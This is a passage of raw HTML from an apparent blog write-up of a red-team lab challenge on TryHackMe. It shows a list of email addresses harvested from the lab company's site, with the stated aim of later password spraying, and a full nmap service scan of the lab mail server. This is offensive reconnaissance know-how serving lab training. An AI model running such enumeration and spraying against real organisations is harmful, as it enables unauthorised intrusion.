\/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>If we go to <code>\/images<\/code> directory, we can see a list of all the users.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091039be&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091039be\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1023\" height=\"846\" data-attachment-id=\"554\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/images-directory\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/images-directory.png?fit=1023%2C846&amp;ssl=1\" data-orig-size=\"1023,846\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"images-directory\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/images-directory.png?fit=1023%2C846&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/images-directory.png?resize=1023%2C846&#038;ssl=1\" alt=\"\" class=\"wp-image-554\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/images-directory.png?w=1023&amp;ssl=1 1023w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/images-directory.png?resize=300%2C248&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/images-directory.png?resize=768%2C635&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Based on this list, we can create a user list that we can use later to enumerate or carry out other attacks such as password spraying and brute-forcing.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/RedTeam-Capstone]\n\u2514\u2500$ cat emails.txt    \nantony.ross@corp.thereserve.loc\nashley.chan@corp.thereserve.loc\nbrenda.henderson@corp.thereserve.loc\ncharlene.thomas@corp.thereserve.loc\nchristopher.smith@corp.thereserve.loc\nemily.harvey@corp.thereserve.loc\nkeith.allen@corp.thereserve.loc\nlaura.wood@corp.thereserve.loc\nleslie.morley@corp.thereserve.loc\nlynda.gordon@corp.thereserve.loc\nmartin.savage@corp.thereserve.loc\nmohammad.ahmed@corp.thereserve.loc\npaula.bailey@corp.thereserve.loc\nrhys.parsons@corp.thereserve.loc\nroy.sims@corp.thereserve.loc\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cat<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">emails.txt<\/span><span style=\"color: #BABED8\">    <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">antony.ross@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">ashley.chan@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">brenda.henderson@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">charlene.thomas@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">christopher.smith@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">emily.harvey@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">keith.allen@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">laura.wood@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">leslie.morley@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">lynda.gordon@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">martin.savage@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">mohammad.ahmed@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">paula.bailey@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">rhys.parsons@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">roy.sims@corp.thereserve.loc<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The <code>Contact Us<\/code> page has a couple of more usernames. We will add them to our list.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091040fd&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091040fd\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"556\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/contact-us\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/contact-us.png?fit=1422%2C800&amp;ssl=1\" data-orig-size=\"1422,800\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"contact-us\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/contact-us.png?fit=1024%2C576&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/contact-us.png?resize=1024%2C576&#038;ssl=1\" alt=\"\" class=\"wp-image-556\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/contact-us.png?resize=1024%2C576&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/contact-us.png?resize=300%2C169&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/contact-us.png?resize=768%2C432&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/contact-us.png?w=1422&amp;ssl=1 1422w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We have gathered some useful data from the web server. The usernames\/emails could be domain users and we can use them on other machines to perform different attacks.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"12-mail-machine-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Mail Machine<\/mark><\/h3>\n\n\n\n<p>We will again start by running NMAP on this machine. From the network diagram, we can see that this is a Windows host and connected directly to the Domain. If we can enumerate and gather any interesting information, we should be able to get a foothold on the network.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/RedTeam-Capstone\/Mail]\n\u2514\u2500$ nmap -p- mail.thereserve.loc -A nmap\/mail-fullscan\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-02-06 11:14 CST\nUnable to split netmask from target expression: &quot;nmap\/mail-fullscan&quot;\nNmap scan report for mail.thereserve.loc (10.200.113.11)\nHost is up (0.21s latency).\nNot shown: 65513 closed tcp ports (conn-refused)\nPORT      STATE SERVICE       VERSION\n22\/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)\n| ssh-hostkey: \n|   2048 f3:6c:52:d2:7f:e9:0e:1c:c1:c7:ac:96:2c:d1:ec:2d (RSA)\n|   256 c2:56:3c:ed:c4:b0:69:a8:e7:ad:3c:31:05:05:e9:85 (ECDSA)\n|_  256 d3:e5:f0:73:75:d5:20:d9:c0:bb:41:99:e7:af:a0:00 (ED25519)\n25\/tcp    open  smtp          hMailServer smtpd\n| smtp-commands: MAIL, SIZE 20480000, AUTH LOGIN, HELP\n|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\n80\/tcp    open  http          Microsoft IIS httpd 10.0\n| http-methods: \n|_  Potentially risky methods: TRACE\n|_http-server-header: Microsoft-IIS\/10.0\n|_http-title: 403 - Forbidden: Access is denied.\n110\/tcp   open  pop3          hMailServer pop3d\n|_pop3-capabilities: USER UIDL TOP\n135\/tcp   open  msrpc         Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn\n143\/tcp   open  imap          hMailServer imapd\n|_imap-capabilities: NAMESPACE IDLE completed CAPABILITY IMAP4 SORT QUOTA CHILDREN RIGHTS=texkA0001 ACL OK IMAP4rev1\n445\/tcp   open  microsoft-ds?\n587\/tcp   open  smtp          hMailServer smtpd\n| smtp-commands: MAIL, SIZE 20480000, AUTH LOGIN, HELP\n|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\n3306\/tcp  open  mysql         MySQL 8.0.31\n| ssl-cert: Subject: commonName=MySQL_Server_8.0.31_Auto_Generated_Server_Certificate\n| Not valid before: 2023-01-10T07:46:11\n|_Not valid after:  2033-01-07T07:46:11\n|_ssl-date: TLS randomness does not represent time\n| mysql-info: \n|   Protocol: 10\n|   Version: 8.0.31\n|   Thread ID: 83\n|   Capabilities flags: 65535\n|   Some Capabilities: SwitchToSSLAfterHandshake, Speaks41ProtocolNew, SupportsCompression, Speaks41ProtocolOld, SupportsTransactions, InteractiveClient, IgnoreSpaceBeforeParenthesis, ODBCClient, FoundRows, IgnoreSigpipes, Support41Auth, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, LongColumnFlag, LongPassword, ConnectWithDatabase, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments\n|   Status: Autocommit\n|   Salt: \\x0D&amp;QZ\\x10\\x05:S\\x0Bl]-b\\x0E7\\x1C,\\8\\x1D\n|_  Auth Plugin Name: caching_sha2_password\n3389\/tcp  open  ms-wbt-server Microsoft Terminal Services\n| rdp-ntlm-info: \n|   Target_Name: THERESERVE\n|   NetBIOS_Domain_Name: THERESERVE\n|   NetBIOS_Computer_Name: MAIL\n|   DNS_Domain_Name: thereserve.loc\n|   DNS_Computer_Name: MAIL.thereserve.loc\n|   DNS_Tree_Name: thereserve.loc\n|   Product_Version: 10.0.17763\n|_  System_Time: 2024-02-06T17:42:18+00:00\n| ssl-cert: Subject: commonName=MAIL.thereserve.loc\n| Not valid before: 2024-02-04T20:25:58\n|_Not valid after:  2024-08-05T20:25:58\n|_ssl-date: 2024-02-06T17:42:28+00:00; -1s from scanner time.\n5985\/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n33060\/tcp open  mysqlx?\n| fingerprint-strings: \n|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe: \n|     Invalid message&quot;\n|     HY000\n|   oracle-tns: \n|     Invalid message-frame.&quot;\n|_    HY000\n47001\/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n49664\/tcp open  msrpc         Microsoft Windows RPC\n49665\/tcp open  msrpc         Microsoft Windows RPC\n49666\/tcp open  msrpc         Microsoft Windows RPC\n49667\/tcp open  msrpc         Microsoft Windows RPC\n49668\/tcp open  msrpc         Microsoft Windows RPC\n49669\/tcp open  msrpc         Microsoft Windows RPC\n49672\/tcp open  msrpc         Microsoft Windows RPC\n49681\/tcp open  msrpc         Microsoft Windows RPC\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port33060-TCP:V=7.94SVN%I=7%D=2\/6%Time=65C26F44%P=x86_64-pc-linux-gnu%r\nSF:(GenericLines,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(GetRequest,9,&quot;\\x05\\0\\\nSF:0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(HTTPOptions,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)\nSF:%r(RTSPRequest,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(RPCCheck,9,&quot;\\x05\\0\\0\nSF:\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(DNSVersionBindReqTCP,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\nSF:\\x1a\\0&quot;)%r(DNSStatusRequestTCP,2B,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0\\x1e\\0\\0\nSF:\\0\\x01\\x08\\x01\\x10\\x88'\\x1a\\x0fInvalid\\x20message\\&quot;\\x05HY000&quot;)%r(SSLSes\nSF:sionReq,2B,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88'\nSF:\\x1a\\x0fInvalid\\x20message\\&quot;\\x05HY000&quot;)%r(TerminalServerCookie,9,&quot;\\x05\\\nSF:0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(TLSSessionReq,2B,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1\nSF:a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88'\\x1a\\x0fInvalid\\x20message\\&quot;\\x05HY000\nSF:&quot;)%r(Kerberos,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(SMBProgNeg,9,&quot;\\x05\\0\\\nSF:0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(X11Probe,2B,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0\\x1e\nSF:\\0\\0\\0\\x01\\x08\\x01\\x10\\x88'\\x1a\\x0fInvalid\\x20message\\&quot;\\x05HY000&quot;)%r(Fo\nSF:urOhFourRequest,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(LPDString,9,&quot;\\x05\\0\nSF:\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(LDAPSearchReq,2B,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\nSF:\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88'\\x1a\\x0fInvalid\\x20message\\&quot;\\x05HY000&quot;\nSF:)%r(SIPOptions,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(LANDesk-RC,9,&quot;\\x05\\0\nSF:\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(TerminalServer,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\nSF:\\0&quot;)%r(NCP,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(NotesRPC,2B,&quot;\\x05\\0\\0\\0\\\nSF:x0b\\x08\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88'\\x1a\\x0fInvalid\\x20mess\nSF:age\\&quot;\\x05HY000&quot;)%r(JavaRMI,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(WMSReque\nSF:st,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(oracle-tns,32,&quot;\\x05\\0\\0\\0\\x0b\\x0\nSF:8\\x05\\x1a\\0%\\0\\0\\0\\x01\\x08\\x01\\x10\\x88'\\x1a\\x16Invalid\\x20message-frame\nSF:\\.\\&quot;\\x05HY000&quot;)%r(giop,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;);\nService Info: Host: MAIL; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-time: \n|   date: 2024-02-06T17:42:19\n|_  start_date: N\/A\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled but not required\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone\/Mail<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-p-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mail.thereserve.loc<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-A<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap\/mail-fullscan<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Starting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7.94<\/span><span style=\"color: #C3E88D\">SVN<\/span><span style=\"color: #BABED8\"> ( <\/span><span style=\"color: #C3E88D\">https:\/\/nmap.org<\/span><span style=\"color: #BABED8\"> ) at 2024-02-06 11:14 CST<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Unable<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">split<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">netmask<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">from<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">target<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">expression:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">nmap\/mail-fullscan<\/span><span style=\"color: #89DDFF\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">scan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">report<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mail.thereserve.loc<\/span><span style=\"color: #BABED8\"> (10.200.113.11)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Host<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">up<\/span><span style=\"color: #BABED8\"> (0.21s <\/span><span style=\"color: #C3E88D\">latency<\/span><span style=\"color: #BABED8\">).<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">shown:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 